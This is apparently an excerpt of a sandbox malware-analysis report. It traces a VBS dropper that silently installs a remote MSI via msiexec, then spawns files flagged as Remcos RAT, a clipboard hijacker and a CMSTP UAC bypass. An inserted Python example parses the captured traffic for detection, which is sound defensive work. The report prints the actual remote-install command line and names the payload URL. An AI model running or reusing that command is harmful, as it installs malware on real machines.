2024-11-30 00:25:03 UTC | 3379 | IN | Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co
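The two msiexec.exe sessions in this report (session 0 above, session 1 below) are the wire-level evidence behind the "Installs a MSI (Microsoft Installer) remotely" signature: Windows Installer, identified by its User-Agent string, requests Slf.msi from github.com, is redirected with a 302 to raw.githubusercontent.com, and receives a 3,581,440-byte application/octet-stream body; the DNS-answer table above ties the two destination IPs back to those names. The following Python is an added example, not part of the Joe Sandbox report or its tooling. It re-types those DNS answers and HTTP sessions as constructed sample records (the record layout is an assumption made for the example, not Joe Sandbox's export format) and flags any msiexec.exe session that fetches a .msi from a host outside an allowlist, carrying the redirect target, the body size and whether the Host header agrees with what the sandbox's own DNS resolved for the destination IP.

```python
import re
from collections import defaultdict

CRLF = "\r\n"

# Constructed sample input re-typed from this report's DNS-answer table as
# "<transaction id> <name> <record type> <value>"; the line format is an
# assumption for this example, not Joe Sandbox's export format.
DNS_ANSWERS = """\
0x5189 github.com A 20.233.83.145
0x56dc raw.githubusercontent.com A 185.199.108.133
0x56dc raw.githubusercontent.com A 185.199.111.133
0x56dc raw.githubusercontent.com A 185.199.110.133
0x56dc raw.githubusercontent.com A 185.199.109.133
0x5537 shed.dual-low.s-part-0035.t-0009.t-msedge.net CNAME s-part-0035.t-0009.t-msedge.net
0x5537 s-part-0035.t-0009.t-msedge.net A 13.107.246.63
"""

# Constructed sample input re-typed from the two msiexec.exe HTTP sessions in
# this report, trimmed to the headers the analysis needs.
HTTP_SESSIONS = [
    {"session": 0, "pid": 4896, "process": r"C:\Windows\System32\msiexec.exe",
     "dst_ip": "20.233.83.145",
     "request": CRLF.join(["GET /Kroby5444/Jim/raw/refs/heads/main/Slf.msi HTTP/1.1",
                           "User-Agent: Windows Installer", "Host: github.com", "", ""]),
     "response": CRLF.join(["HTTP/1.1 302 Found", "Content-Type: text/html; charset=utf-8",
                            "Location: https://raw.githubusercontent.com/Kroby5444/Jim/refs/heads/main/Slf.msi",
                            "", ""])},
    {"session": 1, "pid": 4896, "process": r"C:\Windows\System32\msiexec.exe",
     "dst_ip": "185.199.108.133",
     "request": CRLF.join(["GET /Kroby5444/Jim/refs/heads/main/Slf.msi HTTP/1.1",
                           "User-Agent: Windows Installer", "Host: raw.githubusercontent.com", "", ""]),
     "response": CRLF.join(["HTTP/1.1 200 OK", "Content-Length: 3581440",
                            "Content-Type: application/octet-stream", "", ""])},
]


def parse_dns_answers(text):
    """Map each answered IP to every name resolving to it, CNAME aliases included."""
    cname, ip_to_names = {}, defaultdict(set)
    for line in text.splitlines():
        if line.strip():
            _txid, name, rtype, value = line.split()
            if rtype == "CNAME":
                cname[name.lower()] = value.lower()
            elif rtype == "A":
                ip_to_names[value].add(name.lower())
    for alias, target in cname.items():
        while target in cname:                 # follow CNAME chains (assumes no loops)
            target = cname[target]
        for names in ip_to_names.values():
            if target in names:
                names.add(alias)
    return ip_to_names


def parse_http(raw):
    """Split an HTTP/1.1 message into its start line and a lowercase header dict."""
    start, *lines = raw.split(CRLF + CRLF, 1)[0].split(CRLF)
    headers = {}
    for line in lines:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return start, headers


def analyze_sessions(sessions, ip_to_names, allowed_hosts=frozenset()):
    """Flag msiexec.exe fetching .msi files with the Windows Installer User-Agent from
    hosts outside an allowlist, noting redirects and whether the Host header agrees
    with what the sandbox's own DNS resolved for the destination IP."""
    findings = []
    for s in sessions:
        req_line, req_hdr = parse_http(s["request"])
        status_line, rsp_hdr = parse_http(s["response"])
        _method, path, _version = req_line.split(" ", 2)
        host = req_hdr.get("host", "").lower()
        is_msi = path.lower().split("?", 1)[0].endswith(".msi")
        installer_ua = req_hdr.get("user-agent", "").startswith("Windows Installer")
        if not (s["process"].lower().endswith("\\msiexec.exe") and installer_ua
                and is_msi) or host in allowed_hosts:
            continue
        redirect = re.match(r"https?://([^/]+)", rsp_hdr.get("location", ""))
        findings.append({
            "session": s["session"], "pid": s["pid"], "host": host,
            "dst_ip": s["dst_ip"], "path": path,
            "status": int(status_line.split(" ", 2)[1]),
            "redirect_to": redirect.group(1).lower() if redirect else None,
            "host_matches_dns": host in ip_to_names.get(s["dst_ip"], set()),
            "content_length": int(rsp_hdr.get("content-length", 0)),
            "content_type": rsp_hdr.get("content-type", ""),
        })
    return findings


if __name__ == "__main__":
    names = parse_dns_answers(DNS_ANSWERS)
    for finding in analyze_sessions(HTTP_SESSIONS, names):
        print(finding)
```

Run against the records above, the first finding carries status 302 with redirect_to set to raw.githubusercontent.com and the second carries status 200 with a 3581440-byte application/octet-stream body, which is the chain a reviewer has to read out of the two session tables by hand. The same logic applies unchanged to proxy or EDR network logs that record process, destination, request line and headers; an empty allowlist, as here, flags every remote MSI install, which is the right default outside environments that legitimately deploy MSIs from a known host.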


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.649709185.199.108.1334434896C:\Windows\System32\msiexec.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-11-30 00:25:04 UTC156OUTGET /Kroby5444/Jim/refs/heads/main/Slf.msi HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: */*
                                                                                                              User-Agent: Windows Installer
                                                                                                              Host: raw.githubusercontent.com
                                                                                                              Timestamp: 2024-11-30 00:25:05 UTC, Bytes transferred: 901, Direction: IN
                                                                                                              HTTP/1.1 200 OK
                                                                                                              Connection: close
                                                                                                              Content-Length: 3581440
                                                                                                              Cache-Control: max-age=300
                                                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                              Content-Type: application/octet-stream
                                                                                                              ETag: "357de5659fc40639dda25e915763abf767dbd94e90964d843e25ac9b54d49809"
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-Frame-Options: deny
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              X-GitHub-Request-Id: 41F0:116B33:6BF36:7BED5:674A5B60
                                                                                                              Accept-Ranges: bytes
                                                                                                              Date: Sat, 30 Nov 2024 00:25:05 GMT
                                                                                                              Via: 1.1 varnish
                                                                                                              X-Served-By: cache-nyc-kteb1890083-NYC
                                                                                                              X-Cache: MISS
                                                                                                              X-Cache-Hits: 0
                                                                                                              X-Timer: S1732926305.950255,VS0,VE152
                                                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                              X-Fastly-Request-ID: cdaa79fe786ed87f54181a4b5a60caa61a264d2f
                                                                                                              Expires: Sat, 30 Nov 2024 00:30:05 GMT
                                                                                                              Source-Age: 0



                                                                                                              Target ID:0
                                                                                                              Start time:19:24:53
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\secondaryTask.vbs"
                                                                                                              Imagebase:0x7ff72a210000
                                                                                                              File size:170'496 bytes
                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:2
                                                                                                              Start time:19:24:58
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\msiexec.exe" /i https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi /qn
                                                                                                              Imagebase:0x7ff683cd0000
                                                                                                              File size:69'632 bytes
                                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:3
                                                                                                              Start time:19:24:58
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                              Imagebase:0x7ff683cd0000
                                                                                                              File size:69'632 bytes
                                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:5
                                                                                                              Start time:19:25:10
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 9BBAE1314E73A4B36581DE9B4621B078
                                                                                                              Imagebase:0x210000
                                                                                                              File size:59'904 bytes
                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:6
                                                                                                              Start time:19:25:11
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\EHttpSrv.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:20'680 bytes
                                                                                                              MD5 hash:9329BA45C8B97485926A171E34C2ABB8
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:7
                                                                                                              Start time:19:25:11
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\Updwork.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\Updwork.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:506'816 bytes
                                                                                                              MD5 hash:253C52411B256E4AF301CBA58DCB6CEF
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000007.00000003.2472818121.00000000021F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_MicroClip, Description: Yara detected MicroClip, Source: 00000007.00000003.2472818121.00000000021F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000007.00000003.2472764493.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_MicroClip, Description: Yara detected MicroClip, Source: 00000007.00000003.2472764493.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 37%, ReversingLabs
Reputation:low
Has exited:true

Target ID:8
Start time:19:25:12
Start date:29/11/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\cmd.exe
Imagebase:0x1c0000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2390138149.0000000003300000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:high
Has exited:true

Target ID:9
Start time:19:25:12
Start date:29/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:15
Start time:19:25:22
Start date:29/11/2024
Path:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\EHttpSrv.exe"
Imagebase:0x400000
File size:20'680 bytes
MD5 hash:9329BA45C8B97485926A171E34C2ABB8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:16
Start time:19:25:22
Start date:29/11/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\cmd.exe
Imagebase:0x1c0000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:high
Has exited:true

Target ID:17
Start time:19:25:22
Start date:29/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:19:25:31
Start date:29/11/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WerFault.exe"
Imagebase:0x70000
File size:483'680 bytes
MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000014.00000002.3386555271.00000000024C1000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MicroClip, Description: Yara detected MicroClip, Source: 00000014.00000002.3386555271.00000000024C1000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:false

Target ID:22
Start time:19:25:42
Start date:29/11/2024
Path:C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe
Wow64 process (32bit):true
Commandline:"C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe"
Imagebase:0x400000
File size:506'816 bytes
MD5 hash:253C52411B256E4AF301CBA58DCB6CEF
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000016.00000003.2765936238.0000000002930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MicroClip, Description: Yara detected MicroClip, Source: 00000016.00000003.2765936238.0000000002930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000016.00000003.2765868218.0000000002980000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MicroClip, Description: Yara detected MicroClip, Source: 00000016.00000003.2765868218.0000000002980000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:23
Start time:19:25:51
Start date:29/11/2024
Path:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
Imagebase:0x400000
File size:20'680 bytes
MD5 hash:9329BA45C8B97485926A171E34C2ABB8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.2755135882.0000000000472000.00000008.00000001.01000000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000017.00000002.2755264970.000000000047B000.00000004.00000001.01000000.00000000.sdmp, Author: unknown
Has exited:true

Target ID:24
Start time:19:25:56
Start date:29/11/2024
Path:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\EHttpSrv.exe"
Imagebase:0x400000
File size:20'680 bytes
MD5 hash:9329BA45C8B97485926A171E34C2ABB8
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:25
Start time:19:25:56
Start date:29/11/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\cmd.exe
Imagebase:0x1c0000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000019.00000002.2833446992.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:26
Start time:19:25:56
Start date:29/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:19:26:00
Start date:29/11/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WerFault.exe"
Imagebase:0x70000
File size:483'680 bytes
MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 0000001B.00000002.3386408179.0000000000421000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MicroClip, Description: Yara detected MicroClip, Source: 0000001B.00000002.3386408179.0000000000421000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:false

Target ID:29
Start time:19:26:07
Start date:29/11/2024
Path:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\EHttpSrv.exe"
Imagebase:0x400000
File size:20'680 bytes
MD5 hash:9329BA45C8B97485926A171E34C2ABB8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:30
Start time:19:26:07
Start date:29/11/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\cmd.exe
Imagebase:0x1c0000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.3107816901.0000000005190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001E.00000002.3107816901.0000000005190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001E.00000002.3107816901.0000000005190000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:true

Target ID:31
                                                                                                              Start time:19:26:07
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff66e660000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:32
                                                                                                              Start time:19:26:25
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                                                                                                              Imagebase:0x400000
                                                                                                              File size:20'680 bytes
                                                                                                              MD5 hash:9329BA45C8B97485926A171E34C2ABB8
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.3108383923.0000000000472000.00000008.00000001.01000000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000020.00000002.3108485798.000000000047B000.00000004.00000001.01000000.00000000.sdmp, Author: unknown
                                                                                                              Has exited:true


                                                                                                                Execution Graph

                                                                                                                Execution Coverage:0.9%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:16.8%
                                                                                                                Total number of Nodes:167
                                                                                                                Total number of Limit Nodes:6
                                                                                                                execution_graph (interactive node/edge rendering omitted; API chains recoverable from the node labels, grouped by function):
                                                                                                                • EHttpSrv.exe, image base 0x400000: 0x401cce CRT start-up (GetStartupInfoW, InterlockedCompareExchange, Sleep, _amsg_exit, _initterm_e, _initterm, InterlockedExchange, exit, _cexit, __onexit); 0x401000 GetCommandLineW, wcsstr, LoadLibraryW, GetProcAddress, FreeLibrary; 0x401550 StartServiceCtrlDispatcherW; 0x401580 GetModuleFileNameW, OpenSCManagerW, CreateServiceW, CloseServiceHandle, vswprintf_s, RegOpenKeyExW, RegSetValueExW, RegCreateKeyExW, RegCloseKey; 0x4016e0 OpenSCManagerW, OpenServiceW, DeleteService, CloseServiceHandle; 0x401420 RegisterClassExW, CreateWindowExW, GetModuleFileNameW, Sleep, DestroyWindow; 0x401730 vswprintf_s, RegOpenKeyExW, RegCreateKeyExW, wcsrchr, RegQueryValueExW, RegCloseKey; 0x4017c0 and 0x401910 wcscpy_s, wcsncpy_s, wcscat_s
                                                                                                                • DLL at image base 0x20400000 in process 6 (___DllMainCRTStartup present): 0x20478e6a DllMain CRT start-up (GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter, InterlockedCompareExchange, InterlockedExchange, Sleep, _amsg_exit, _initterm_e, _initterm, _decode_pointer, _encoded_null, free, ordinal imports #1079/#1087/#1162); 0x20403f12 GlobalAlloc; 0x20404177 CreateFileW; 0x204041b0 GlobalAlloc, ReadFile, CloseHandle; 0x20404317 GlobalAlloc; 0x20404485 LoadLibraryW; 0x204044d0 VirtualProtect, VirtualProtect

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004017C0: wcscpy_s.MSVCR80 ref: 00401803
                                                                                                                  • Part of subcall function 004017C0: wcscpy_s.MSVCR80 ref: 00401859
                                                                                                                  • Part of subcall function 004017C0: wcscpy_s.MSVCR80 ref: 004018B5
                                                                                                                • GetCommandLineW.KERNEL32 ref: 00401016
                                                                                                                • wcsstr.MSVCR80 ref: 00401024
                                                                                                                • GetCommandLineW.KERNEL32 ref: 00401039
                                                                                                                • wcsstr.MSVCR80 ref: 00401041
                                                                                                                  • Part of subcall function 00401580: GetModuleFileNameW.KERNEL32(00000000,?,00000104,76231D70), ref: 004015B6
                                                                                                                  • Part of subcall function 00401580: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 004015C3
                                                                                                                  • Part of subcall function 00401580: CreateServiceW.ADVAPI32(00000000,EHttpSrv,ESET HTTP Server,000F01FF,00000010,00000003,00000001,?,00000000,00000000,00000000,?,00000000,6FB10C0A), ref: 004015FB
                                                                                                                  • Part of subcall function 00401580: CloseServiceHandle.ADVAPI32(00000000), ref: 00401610
                                                                                                                  • Part of subcall function 00401580: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,0002001F,?), ref: 00401645
                                                                                                                  • Part of subcall function 00401580: RegSetValueExW.ADVAPI32(?,Description,00000000,00000001,ESET HTTP Server,?), ref: 0040167C
                                                                                                                  • Part of subcall function 00401580: RegCreateKeyExW.ADVAPI32(?,Parameters,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 0040169F
                                                                                                                  • Part of subcall function 00401580: RegCloseKey.ADVAPI32(?), ref: 004016B4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2333072497.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2333057818.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000006.00000002.2333090341.0000000000403000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000006.00000002.2333105556.0000000000404000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000006.00000002.2333123258.0000000000405000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
